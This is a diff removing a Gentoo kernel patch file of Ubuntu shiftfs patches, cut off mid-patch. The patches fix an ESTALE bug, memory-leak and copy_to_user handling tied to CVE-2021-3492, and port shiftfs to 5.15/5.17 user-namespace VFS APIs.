- -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 1 + - 1 file changed, 1 insertion(+) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 5d88193b41db..f9a5c94a9793 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -20,6 +20,7 @@ - #include <linux/posix_acl.h> - #include <linux/posix_acl_xattr.h> - #include <linux/uio.h> -+#include <linux/fiemap.h> - - struct shiftfs_super_info { - struct vfsmount *mnt; --- -2.39.2 - -From 436cc946e1acb3833c41e6a7df3239f5f559369a Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Tue, 23 Jun 2020 19:46:16 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent ESTALE for LOOKUP_JUMP - lookups -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1872757 - -Users reported that creating temporary files shiftfs reports ESTALE. -This can be reproduced via: - -import tempfile -import os - -def test(): - with tempfile.TemporaryFile() as fd: - fd.write("data".encode('utf-8')) - # re-open the file to get a read-only file descriptor - return open(f"/proc/self/fd/{fd.fileno()}", "r") - -def main(): - fd = test() - fd.close() - -if __name__ == "__main__": - main() - -a similar issue was reported here: -https://github.com/systemd/systemd/issues/14861 - -Our revalidate methods were very opinionated about whether or not a -lower dentry was valid especially when it became unlinked we simply -invalidated the lower dentry which caused above bug to surface. This has -led to bugs where a ESTALE was returned for e.g. temporary files that -were created and directly re-opened afterwards through -/proc/<pid>/fd/<nr-of-deleted-file>. When a file is re-opened through -/proc/<pid>/fd/<nr> LOOKUP_JUMP is set and the vfs will revalidate via -d_weak_revalidate(). Since the file has been unhashed or even already -gone negative we'd fail the open when we should've succeeded. 
- -Reported-by: Christian Kellner <ckellner@redhat.com> -Reported-by: Evgeny Vereshchagin <evvers@ya.ru> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Cc: Seth Forshee <seth.forshee@canonical.com> -Link: https://github.com/systemd/systemd/issues/14861 -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 4 ---- - 1 file changed, 4 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index f9a5c94a9793..3cfd1881e9a2 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -252,8 +252,6 @@ static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags) - struct inode *loweri = d_inode(lowerd); - - shiftfs_copyattr(loweri, inode); -- if (!inode->i_nlink) -- err = 0; - } - - return err; -@@ -279,8 +277,6 @@ static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags) - struct inode *loweri = d_inode(lowerd); - - shiftfs_copyattr(loweri, inode); -- if (!inode->i_nlink) -- err = 0; - } - - return err; --- -2.39.2 - -From 21c3ebac069050649a03a1e9d5f2fd4c895fc6cd Mon Sep 17 00:00:00 2001 -From: Andrea Righi <andrea.righi@canonical.com> -Date: Wed, 30 Dec 2020 11:10:20 +0100 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix build error with 5.11 -Cc: mpagano@gentoo.org - -After commit: - - 8760c909f54a82aaa6e76da19afe798a0c77c3c3 ("file: Rename __close_fd to close_fd and remove the files parameter") - -__close_fd() has been renamed to close_fd() and the files parameter has -been removed. - -Change the shiftfs code to properly support this change. 
- -Signed-off-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 4 ++-- - 1 file changed, 2 insertions(+), 2 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 3cfd1881e9a2..4f1d94903557 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1420,7 +1420,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg, - else - ret = copy_to_user(arg, v2, sizeof(*v2)); - -- __close_fd(current->files, fd); -+ close_fd(fd); - kfree(v1); - kfree(v2); - -@@ -1468,7 +1468,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - /* - * shiftfs_real_fdget() does not take a reference to lfd.file, so - * take a reference here to offset the one which will be put by -- * __close_fd(), and make sure that reference is put on fdput(lfd). -+ * close_fd(), and make sure that reference is put on fdput(lfd). - */ - get_file(lfd.file); - lfd.flags |= FDPUT_FPUT; --- -2.39.2 - -From c0ebd52879a8805e07e59a25e72bce73e2ddcd90 Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Fri, 9 Apr 2021 13:01:06 -0500 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: free allocated memory in - shiftfs_btrfs_ioctl_fd_replace() error paths -Cc: mpagano@gentoo.org - -Many error paths in shiftfs_btrfs_ioctl_fd_replace() do not free memory -allocated near the top of the function. Fix up these error paths to free -the memory. - -Additionally, the addresses for the allocated memory are assigned to -return parameters early in the function, before we know whether or not -the function as a whole will return success. Wait to assign these values -until we know the function was successful, and for good measure -initialize the return parameters to NULL at the start. 
- -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -CVE-2021-3492 -Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 28 +++++++++++++++++++++------- - 1 file changed, 21 insertions(+), 7 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 4f1d94903557..8eab93691d62 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1438,6 +1438,9 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - struct btrfs_ioctl_vol_args *v1 = NULL; - struct btrfs_ioctl_vol_args_v2 *v2 = NULL; - -+ *b1 = NULL; -+ *b2 = NULL; -+ - if (!is_btrfs_snap_ioctl(cmd)) - return 0; - -@@ -1446,23 +1449,23 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - if (IS_ERR(v1)) - return PTR_ERR(v1); - oldfd = v1->fd; -- *b1 = v1; - } else { - v2 = memdup_user(arg, sizeof(*v2)); - if (IS_ERR(v2)) - return PTR_ERR(v2); - oldfd = v2->fd; -- *b2 = v2; - } - - src = fdget(oldfd); -- if (!src.file) -- return -EINVAL; -+ if (!src.file) { -+ ret = -EINVAL; -+ goto err_free; -+ } - - ret = shiftfs_real_fdget(src.file, &lfd); - if (ret) { - fdput(src); -- return ret; -+ goto err_free; - } - - /* -@@ -1477,7 +1480,8 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - *newfd = get_unused_fd_flags(lfd.file->f_flags); - if (*newfd < 0) { - fdput(lfd); -- return *newfd; -+ ret = *newfd; -+ goto err_free; - } - - fd_install(*newfd, lfd.file); -@@ -1492,8 +1496,18 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - v2->fd = oldfd; - } - -- if (ret) -+ if (!ret) { -+ *b1 = v1; -+ *b2 = v2; -+ } else { - shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2); -+ } -+ -+ return ret; -+ -+err_free: -+ kfree(v1); -+ kfree(v2); - - return ret; - } --- -2.39.2 - -From f0a7637da44fdf17351c0ba4c3f616941c749f57 Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Fri, 9 Apr 2021 13:10:37 -0500 -Subject: 
[PATCH] UBUNTU: SAUCE: shiftfs: handle copy_to_user() return values - correctly -Cc: mpagano@gentoo.org - -shiftfs expects copy_to_user() to return a negative error code on -failure, when it actually returns the amount of uncopied data. Fix all -code using copy_to_user() to handle the return values correctly. - -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -CVE-2021-3492 -Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 3 ++- - 1 file changed, 2 insertions(+), 1 deletion(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 8eab93691d62..abeb7db3b9be 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1424,7 +1424,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg, - kfree(v1); - kfree(v2); - -- return ret; -+ return ret ? -EFAULT: 0; - } - - static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, -@@ -1501,6 +1501,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - *b2 = v2; - } else { - shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2); -+ ret = -EFAULT; - } - - return ret; --- -2.39.2 - -From d2e7abdd84fb28842c61ffd7128977f29518e4ef Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Mon, 9 Aug 2021 17:15:28 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix sendfile() invocations -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1939301 - -Upstream commit 36e2c7421f02 ("fs: don't allow splice read/write without explicit ops") -caused a regression for us. It states: - -> default_file_splice_write is the last piece of generic code that uses -> set_fs to make the uaccess routines operate on kernel pointers. It -> implements a "fallback loop" for splicing from files that do not actually -> provide a proper splice_read method. 
The usual file systems and other -> high bandwidth instances all provide a ->splice_read, so this just removes -> support for various device drivers and procfs/debugfs files. If splice -> support for any of those turns out to be important it can be added back -> by switching them to the iter ops and using generic_file_splice_read. - -this means that currently all workloads making use of sendfile() on -shiftfs fail. This includes LXD, Anbox and a range of others. Fix this -by providing explicit .splice_read() and .splice_write() methods which -jus restores the status quo and we keep using a generic method provided -by the vfs. - -Cc: Seth Forshee <sforshee@kernel.org> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Paolo Pisati <paolo.pisati@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 2 ++ - 1 file changed, 2 insertions(+) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index abeb7db3b9be..f5f6d8d8144e 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1737,6 +1737,8 @@ const struct file_operations shiftfs_file_operations = { - .compat_ioctl = shiftfs_compat_ioctl, - .copy_file_range = shiftfs_copy_file_range, - .remap_file_range = shiftfs_remap_file_range, -+ .splice_read = generic_file_splice_read, -+ .splice_write = iter_file_splice_write, - }; - - const struct file_operations shiftfs_dir_operations = { --- -2.39.2 - -From ff28712d9e52b3b0b2127e9898b96f7c1e11bd26 Mon Sep 17 00:00:00 2001 -From: Andrea Righi <andrea.righi@canonical.com> -Date: Thu, 20 Jan 2022 16:55:24 +0100 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 5.15 -Cc: mpagano@gentoo.org - -WARNING: after this change we may see some regressions if shiftfs is -used with filesystem namespaces. 
- -Signed-off-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 107 ++++++++++++++++++++++++++++++--------------------- - 1 file changed, 64 insertions(+), 43 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index f5f6d8d8144e..76c54bc12018 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -308,7 +308,8 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode, - return p; - } - --static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode, -+static int shiftfs_setxattr(struct user_namespace *ns, -+ struct dentry *dentry, struct inode *inode, - const char *name, const void *value, - size_t size, int flags) - { -@@ -317,7 +318,7 @@ static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode, - const struct cred *oldcred; - - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = vfs_setxattr(lowerd, name, value, size, flags); -+ err = vfs_setxattr(ns, lowerd, name, value, size, flags); - revert_creds(oldcred); - - shiftfs_copyattr(lowerd->d_inode, inode); -@@ -334,7 +335,7 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler, - const struct cred *oldcred; - - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = vfs_getxattr(lowerd, name, value, size); -+ err = vfs_getxattr(&init_user_ns, lowerd, name, value, size); - revert_creds(oldcred); - - return err; -@@ -354,14 +355,15 @@ static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list, - return err; - } - --static int shiftfs_removexattr(struct dentry *dentry, const char *name) -+static int shiftfs_removexattr(struct user_namespace *ns, -+ struct dentry *dentry, const char *name) - { - struct dentry *lowerd = dentry->d_fsdata; - int err; - const struct cred *oldcred; - - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = vfs_removexattr(lowerd, name); -+ err = vfs_removexattr(ns, lowerd, name); - revert_creds(oldcred); - - /* update c/mtime */ -@@ -371,13 
+373,14 @@ static int shiftfs_removexattr(struct dentry *dentry, const char *name) - } - - static int shiftfs_xattr_set(const struct xattr_handler *handler, -+ struct user_namespace *ns, - struct dentry *dentry, struct inode *inode, - const char *name, const void *value, size_t size, - int flags) - { - if (!value) -- return shiftfs_removexattr(dentry, name); -- return shiftfs_setxattr(dentry, inode, name, value, size, flags); -+ return shiftfs_removexattr(ns, dentry, name); -+ return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags); - } - - static int shiftfs_inode_test(struct inode *inode, void *data) -@@ -391,7 +394,8 @@ static int shiftfs_inode_set(struct inode *inode, void *data) - return 0; - } - --static int shiftfs_create_object(struct inode *diri, struct dentry *dentry, -+static int shiftfs_create_object(struct user_namespace *ns, -+ struct inode *diri, struct dentry *dentry, - umode_t mode, const char *symlink, - struct dentry *hardlink, bool excl) - { -@@ -453,7 +457,7 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry, - inode->i_state |= I_CREATING; - spin_unlock(&inode->i_lock); - -- inode_init_owner(inode, diri, mode); -+ inode_init_owner(ns, inode, diri, mode); - modei = inode->i_mode; - } - -@@ -464,22 +468,22 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry, - - if (hardlink) { - lowerd_link = hardlink->d_fsdata; -- err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL); -+ err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL); - } else { - switch (modei & S_IFMT) { - case S_IFDIR: -- err = vfs_mkdir(loweri_dir, lowerd_new, modei); -+ err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei); - break; - case S_IFREG: -- err = vfs_create(loweri_dir, lowerd_new, modei, excl); -+ err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl); - break; - case S_IFLNK: -- err = vfs_symlink(loweri_dir, lowerd_new, symlink); -+ err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink); - 
break; - case S_IFSOCK: - /* fall through */ - case S_IFIFO: -- err = vfs_mknod(loweri_dir, lowerd_new, modei, 0); -+ err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0); - break; - default: - err = -EINVAL; -@@ -535,41 +539,43 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry, - return err; - } - --static int shiftfs_create(struct inode *dir, struct dentry *dentry, -+static int shiftfs_create(struct user_namespace *ns, -+ struct inode *dir, struct dentry *dentry, - umode_t mode, bool excl) - { - mode |= S_IFREG; - -- return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl); -+ return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl); - } - --static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry, -+static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry, - umode_t mode) - { - mode |= S_IFDIR; - -- return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false); -+ return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false); - } - - static int shiftfs_link(struct dentry *hardlink, struct inode *dir, - struct dentry *dentry) - { -- return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false); -+ return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false); - } - --static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode, -+static int shiftfs_mknod(struct user_namespace *ns, -+ struct inode *dir, struct dentry *dentry, umode_t mode, - dev_t rdev) - { - if (!S_ISFIFO(mode) && !S_ISSOCK(mode)) - return -EPERM; - -- return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false); -+ return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false); - } - --static int shiftfs_symlink(struct inode *dir, struct dentry *dentry, -+static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry, - const char *symlink) - { -- return shiftfs_create_object(dir, dentry, S_IFLNK, 
symlink, NULL, false); -+ return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false); - } - - static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) -@@ -584,9 +590,9 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) - oldcred = shiftfs_override_creds(dentry->d_sb); - inode_lock_nested(loweri, I_MUTEX_PARENT); - if (rmdir) -- err = vfs_rmdir(loweri, lowerd); -+ err = vfs_rmdir(&init_user_ns, loweri, lowerd); - else -- err = vfs_unlink(loweri, lowerd, NULL); -+ err = vfs_unlink(&init_user_ns, loweri, lowerd, NULL); - revert_creds(oldcred); - - if (!err) { -@@ -615,7 +621,8 @@ static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry) - return shiftfs_rm(dir, dentry, true); - } - --static int shiftfs_rename(struct inode *olddir, struct dentry *old, -+static int shiftfs_rename(struct user_namespace *ns, -+ struct inode *olddir, struct dentry *old, - struct inode *newdir, struct dentry *new, - unsigned int flags) - { -@@ -625,6 +632,14 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old, - *trapd; - struct inode *loweri_dir_old = lowerd_dir_old->d_inode, - *loweri_dir_new = lowerd_dir_new->d_inode; -+ struct renamedata rd = { -+ .old_mnt_userns = ns, -+ .old_dir = loweri_dir_old, -+ .old_dentry = lowerd_old, -+ .new_mnt_userns = ns, -+ .new_dir = loweri_dir_new, -+ .new_dentry = lowerd_new, -+ }; - int err = -EINVAL; - const struct cred *oldcred; - -@@ -634,8 +649,7 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old, - goto out_unlock; - - oldcred = shiftfs_override_creds(old->d_sb); -- err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new, -- NULL, flags); -+ err = vfs_rename(&rd); - revert_creds(oldcred); - - shiftfs_copyattr(loweri_dir_old, olddir); -@@ -691,7 +705,7 @@ static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry, - return d_splice_alias(inode, dentry); - } - --static int shiftfs_permission(struct inode 
*inode, int mask) -+static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, int mask) - { - int err; - const struct cred *oldcred; -@@ -702,12 +716,12 @@ static int shiftfs_permission(struct inode *inode, int mask) - return -ECHILD; - } - -- err = generic_permission(inode, mask); -+ err = generic_permission(ns, inode, mask); - if (err) - return err; - - oldcred = shiftfs_override_creds(inode->i_sb); -- err = inode_permission(loweri, mask); -+ err = inode_permission(ns, loweri, mask); - revert_creds(oldcred); - - return err; -@@ -733,7 +747,8 @@ static int shiftfs_fiemap(struct inode *inode, - return err; - } - --static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry, -+static int shiftfs_tmpfile(struct user_namespace *ns, -+ struct inode *dir, struct dentry *dentry, - umode_t mode) - { - int err; -@@ -745,13 +760,13 @@ static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry, - return -EOPNOTSUPP; - - oldcred = shiftfs_override_creds(dir->i_sb); -- err = loweri->i_op->tmpfile(loweri, lowerd, mode); -+ err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode); - revert_creds(oldcred); - - return err; - } - --static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) -+static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, struct iattr *attr) - { - struct dentry *lowerd = dentry->d_fsdata; - struct inode *loweri = lowerd->d_inode; -@@ -761,7 +776,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - struct shiftfs_super_info *sbinfo = sb->s_fs_info; - int err; - -- err = setattr_prepare(dentry, attr); -+ err = setattr_prepare(ns, dentry, attr); - if (err) - return err; - -@@ -778,7 +793,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - - inode_lock(loweri); - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = notify_change(lowerd, &newattr, NULL); -+ err = notify_change(ns, lowerd, &newattr, NULL); - revert_creds(oldcred); - 
inode_unlock(loweri); - -@@ -787,7 +802,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - return err; - } - --static int shiftfs_getattr(const struct path *path, struct kstat *stat, -+static int shiftfs_getattr(struct user_namespace *ns, -+ const struct path *path, struct kstat *stat, - u32 request_mask, unsigned int query_flags) - { - struct inode *inode = path->dentry->d_inode; -@@ -870,9 +886,9 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to, - entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid)); - break; - case ACL_GROUP: -- kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id)); -+ kgid = make_kgid(from, le32_to_cpu(entry->e_id)); - kgid = shift_kgid(from, to, kgid); -- entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid)); -+ entry->e_id = cpu_to_le32(from_kgid(from, kgid)); - break; - default: - break; -@@ -880,7 +896,8 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to, - } - } - --static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type) -+static struct posix_acl * -+shiftfs_get_acl(struct inode *inode, int type, bool rcu) - { - struct inode *loweri = inode->i_private; - const struct cred *oldcred; -@@ -890,6 +907,9 @@ static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type) - int size; - int err; - -+ if (rcu) -+ return ERR_PTR(-ECHILD); -+ - if (!IS_POSIXACL(loweri)) - return NULL; - -@@ -941,6 +961,7 @@ shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler, - - static int - shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler, -+ struct user_namespace *ns, - struct dentry *dentry, struct inode *inode, - const char *name, const void *value, - size_t size, int flags) -@@ -952,17 +973,17 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler, - return -EOPNOTSUPP; - if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode)) - return value ? 
-EACCES : 0; -- if (!inode_owner_or_capable(inode)) -+ if (!inode_owner_or_capable(ns, inode)) - return -EPERM; - - if (value) { - shift_acl_xattr_ids(inode->i_sb->s_user_ns, - loweri->i_sb->s_user_ns, - (void *)value, size); -- err = shiftfs_setxattr(dentry, inode, handler->name, value, -+ err = shiftfs_setxattr(ns, dentry, inode, handler->name, value, - size, flags); - } else { -- err = shiftfs_removexattr(dentry, handler->name); -+ err = shiftfs_removexattr(ns, dentry, handler->name); - } - - if (!err) --- -2.39.2 - -From df4546ab77323af5bd40996244af7ade6c99054b Mon Sep 17 00:00:00 2001 -From: Andrea Righi <andrea.righi@canonical.com> -Date: Wed, 13 Apr 2022 15:26:22 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: always rely on init_user_ns -Cc: mpagano@gentoo.org - -With the porting of shiftfs from 5.15 to 5.17 some filesystem-related -functions are now passing struct user_namespace as argument, however -shiftfs logic is still relying on the fact that these functions need to -use the main filesystem namespace. - -Make sure to always use init_user_ns to prevent breakage of system -components that rely on shiftfs. - -Without this fix lxd was showing some issues, like failing to create any -file inside a container when shiftfs was used (e.g., using zfs as -storage pool). 
- -Signed-off-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 50 ++++++++++++++++++++++++-------------------------- - 1 file changed, 24 insertions(+), 26 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 76c54bc12018..a21624c529f0 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -308,8 +308,7 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode, - return p; - } - --static int shiftfs_setxattr(struct user_namespace *ns, -- struct dentry *dentry, struct inode *inode, -+static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode, - const char *name, const void *value, - size_t size, int flags) - { -@@ -318,7 +317,7 @@ static int shiftfs_setxattr(struct user_namespace *ns, - const struct cred *oldcred; - - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = vfs_setxattr(ns, lowerd, name, value, size, flags); -+ err = vfs_setxattr(&init_user_ns, lowerd, name, value, size, flags); - revert_creds(oldcred); - - shiftfs_copyattr(lowerd->d_inode, inode); -@@ -363,7 +362,7 @@ static int shiftfs_removexattr(struct user_namespace *ns, - const struct cred *oldcred; - - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = vfs_removexattr(ns, lowerd, name); -+ err = vfs_removexattr(&init_user_ns, lowerd, name); - revert_creds(oldcred); - - /* update c/mtime */ -@@ -379,8 +378,8 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler, - int flags) - { - if (!value) -- return shiftfs_removexattr(ns, dentry, name); -- return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags); -+ return shiftfs_removexattr(&init_user_ns, dentry, name); -+ return shiftfs_setxattr(dentry, inode, name, value, size, flags); - } - - static int shiftfs_inode_test(struct inode *inode, void *data) -@@ -394,8 +393,7 @@ static int shiftfs_inode_set(struct inode *inode, void *data) - return 0; - } - --static int shiftfs_create_object(struct user_namespace 
*ns, -- struct inode *diri, struct dentry *dentry, -+static int shiftfs_create_object(struct inode *diri, struct dentry *dentry, - umode_t mode, const char *symlink, - struct dentry *hardlink, bool excl) - { -@@ -457,7 +455,7 @@ static int shiftfs_create_object(struct user_namespace *ns, - inode->i_state |= I_CREATING; - spin_unlock(&inode->i_lock); - -- inode_init_owner(ns, inode, diri, mode); -+ inode_init_owner(&init_user_ns, inode, diri, mode); - modei = inode->i_mode; - } - -@@ -468,22 +466,22 @@ static int shiftfs_create_object(struct user_namespace *ns, - - if (hardlink) { - lowerd_link = hardlink->d_fsdata; -- err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL); -+ err = vfs_link(lowerd_link, &init_user_ns, loweri_dir, lowerd_new, NULL); - } else { - switch (modei & S_IFMT) { - case S_IFDIR: -- err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei); -+ err = vfs_mkdir(&init_user_ns, loweri_dir, lowerd_new, modei); - break; - case S_IFREG: -- err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl); -+ err = vfs_create(&init_user_ns, loweri_dir, lowerd_new, modei, excl); - break; - case S_IFLNK: -- err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink); -+ err = vfs_symlink(&init_user_ns, loweri_dir, lowerd_new, symlink); - break; - case S_IFSOCK: - /* fall through */ - case S_IFIFO: -- err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0); -+ err = vfs_mknod(&init_user_ns, loweri_dir, lowerd_new, modei, 0); - break; - default: - err = -EINVAL; -@@ -545,7 +543,7 @@ static int shiftfs_create(struct user_namespace *ns, - { - mode |= S_IFREG; - -- return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl); -+ return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl); - } - - static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry, -@@ -553,13 +551,13 @@ static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct de - { - mode |= S_IFDIR; - -- return shiftfs_create_object(ns, dir, 
dentry, mode, NULL, NULL, false); -+ return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false); - } - - static int shiftfs_link(struct dentry *hardlink, struct inode *dir, - struct dentry *dentry) - { -- return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false); -+ return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false); - } - - static int shiftfs_mknod(struct user_namespace *ns, -@@ -569,13 +567,13 @@ static int shiftfs_mknod(struct user_namespace *ns, - if (!S_ISFIFO(mode) && !S_ISSOCK(mode)) - return -EPERM; - -- return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false); -+ return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false); - } - - static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry, - const char *symlink) - { -- return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false); -+ return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false); - } - - static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) -@@ -716,12 +714,12 @@ static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, in - return -ECHILD; - } - -- err = generic_permission(ns, inode, mask); -+ err = generic_permission(&init_user_ns, inode, mask); - if (err) - return err; - - oldcred = shiftfs_override_creds(inode->i_sb); -- err = inode_permission(ns, loweri, mask); -+ err = inode_permission(&init_user_ns, loweri, mask); - revert_creds(oldcred); - - return err; -@@ -760,7 +758,7 @@ static int shiftfs_tmpfile(struct user_namespace *ns, - return -EOPNOTSUPP; - - oldcred = shiftfs_override_creds(dir->i_sb); -- err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode); -+ err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode); - 